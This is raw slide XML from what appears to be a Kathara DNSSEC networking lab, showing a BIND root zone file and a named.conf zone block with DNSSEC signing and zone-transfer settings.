            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$TTL 60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     ROOT-SERVER.    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root.ROOT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-SERVER. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      ROOT-SERVER-2.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.    IN      A       10.0.3.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER-2.  IN      A       100.0.75.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>it.             IN      NS      dnsit.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit.it.       IN      A       10.0.3.10</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE746CF2-5E62-F545-CE7D-D87D971528A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2712" cy="132"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AED43B1-4E5A-2903-1457-5442CCE0EBBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAEADF54-A0E6-5B9B-9659-494B5E418720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51DE66FA-25DC-2B35-A37D-991E966B7930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="319334842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C16668-DB80-7409-7FEB-F3E73CBE4F8F}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D935351-E764-7A23-765D-C83C21A115E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1814065"/>
            <a:ext cx="7641005" cy="3205608"/>
            <a:chOff x="126" y="3285"/>
            <a:chExt cx="5943" cy="1189"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{184E2B51-A5E0-0DCA-A553-3B03FE5A69B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="1122"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone "." {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> master;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-policy default;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>inline-signing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>allow</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-transfer { 100.0.75.5; }; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>also-notify</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> { 100.0.75.5; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFE6DE0E-AB83-9FA9-C7FB-CAEE6F249C5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="170" y="3285"/>
              <a:ext cx="2927" cy="132"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94CB584C-0D9C-B07D-1E6B-A7C41C9F413B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D757E562-766F-3041-096C-341EE0BCF8C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
